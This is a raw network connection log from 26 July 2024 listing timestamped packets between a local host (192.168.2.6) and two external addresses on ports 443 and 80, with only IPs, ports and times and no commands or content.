Jul 26, 2024 12:57:30.554460049 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.554502964 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.554558992 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.554570913 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.554601908 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.554624081 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.571549892 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.571604013 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.571650982 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.571712971 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.571753979 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.571772099 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.587110043 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.587124109 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.587177038 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.587187052 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.587227106 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.602947950 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.603013992 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.603050947 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.603071928 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.603101969 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.603123903 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.610207081 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.610250950 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.610284090 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.610296965 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.610327959 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.610348940 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.625751972 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.625792980 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.625839949 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.625848055 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.625873089 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.625893116 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.632822990 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.632869005 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.632900000 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.632908106 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.632934093 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.632956028 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.637584925 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.637630939 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.637664080 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.637672901 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.637707949 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.637721062 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.647603989 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.647659063 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.647689104 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.647696972 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.647737026 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.647913933 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.647967100 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.648130894 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.648153067 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.884491920 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.884540081 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.884654045 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.885024071 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.885035992 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:31.102684021 CEST	80	60811	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:31.102737904 CEST	60811	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:31.103522062 CEST	60811	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:31.109826088 CEST	80	60811	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:31.396799088 CEST	80	60811	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:31.396905899 CEST	60811	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:31.507313013 CEST	60811	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:31.507653952 CEST	60813	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:31.513015985 CEST	80	60813	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:31.513098955 CEST	60813	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:31.513214111 CEST	60813	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:31.513745070 CEST	80	60811	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:31.513796091 CEST	60811	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:31.518131018 CEST	80	60813	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:31.633424997 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:31.633511066 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:31.634087086 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:31.634097099 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:31.635687113 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:31.635693073 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.074107885 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.074141979 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.074162960 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.074193001 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.074245930 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.074261904 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.074323893 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.098845959 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.098900080 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.099059105 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.099060059 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.099093914 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.099149942 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.164591074 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.164654970 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.164792061 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.164792061 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.164829016 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.164886951 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.195298910 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.195324898 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.195492983 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.195492983 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.195543051 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.195600033 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.234098911 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.234127045 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.234318972 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.234355927 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.234417915 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.258956909 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.258976936 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.259140968 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.259174109 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.259227037 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.277594090 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.277612925 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.277725935 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.277740955 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.277798891 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.278377056 CEST	80	60813	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:32.278460026 CEST	60813	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:32.280910969 CEST	60813	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:32.285842896 CEST	80	60813	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:32.295322895 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.295336962 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.295427084 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.295435905 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.295486927 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.314344883 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.314358950 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.314469099 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.314481974 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.314538956 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.340078115 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.340123892 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.340264082 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.340264082 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.340303898 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.340361118 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.350982904 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.351025105 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.351070881 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.351079941 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.351120949 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.351151943 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.357707024 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.357750893 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.357811928 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.357825041 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.357867002 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.357893944 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.373331070 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.373377085 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.373451948 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.373490095 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.373512030 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.373542070 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.379542112 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.379584074 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.379645109 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.379652977 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.379856110 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.389519930 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.389559984 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.389821053 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.389853954 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.390074968 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.419749022 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.419809103 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.419996023 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.419996023 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.420030117 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.420243025 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.423507929 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.423556089 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.423685074 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.423685074 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.423718929 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.423918009 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.438036919 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.438076973 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.438349009 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.438380957 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.438604116 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.441611052 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.441657066 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.441705942 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.441721916 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.441751957 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.441787958 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.448620081 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.448658943 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.448811054 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.448811054 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.448878050 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.448946953 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.459606886 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.459654093 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.459707022 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.459722042 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.459758043 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.459779978 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.470383883 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.470428944 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.470534086 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.470534086 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.470550060 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.470611095 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.480912924 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.480953932 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.480992079 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.480999947 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.481242895 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.481242895 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.507443905 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.507504940 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.507757902 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.507790089 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.507850885 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.510704994 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.510749102 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.510799885 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.510814905 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.510854959 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.510879040 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.524069071 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.524108887 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.524199009 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.524199963 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.524266005 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.524324894 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.527683020 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.527724028 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.527765036 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.527774096 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.527801991 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.527831078 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.533971071 CEST	80	60813	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:32.534041882 CEST	60813	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:32.543720961 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.543787003 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.543812037 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.543819904 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.543852091 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.543879032 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.556936026 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.556977987 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.557029009 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.557049990 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.557079077 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.557101965 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.564389944 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.564433098 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.564480066 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.564497948 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.564553022 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.564553022 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.574542999 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.574588060 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.574629068 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.574639082 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.574668884 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.574696064 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.601192951 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.601259947 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.601310015 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.601319075 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.601372957 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.604233980 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.604279041 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.604331017 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.604357004 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.604387999 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.604417086 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.618036985 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.618086100 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.618141890 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.618160009 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.618190050 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.618212938 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.621556044 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.621596098 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.621681929 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.621694088 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.621781111 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.647716045 CEST	60813	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:32.648125887 CEST	60814	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:32.899595976 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.899663925 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.899790049 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.899791002 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.899832964 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.899893999 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.902012110 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.902064085 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.902102947 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.902120113 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.902152061 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.902170897 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.902708054 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.902789116 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.902801037 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.902859926 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.902877092 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.902934074 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.902987957 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.902987957 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.903023005 CEST	443	60812	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:32.903083086 CEST	60812	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:32.904450893 CEST	80	60814	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:32.904545069 CEST	60814	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:32.904742002 CEST	60814	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:32.906733036 CEST	80	60813	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:32.906789064 CEST	60813	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:32.909878016 CEST	80	60814	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:33.173840046 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:33.173903942 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:33.174109936 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:33.174582958 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:33.174603939 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:33.682446003 CEST	80	60814	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:33.682735920 CEST	60814	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:33.683307886 CEST	60814	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:33.688533068 CEST	80	60814	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:33.859056950 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:33.859158039 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:33.859572887 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:33.859590054 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:33.861258030 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:33.861265898 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:33.939444065 CEST	80	60814	185.215.113.16	192.168.2.6
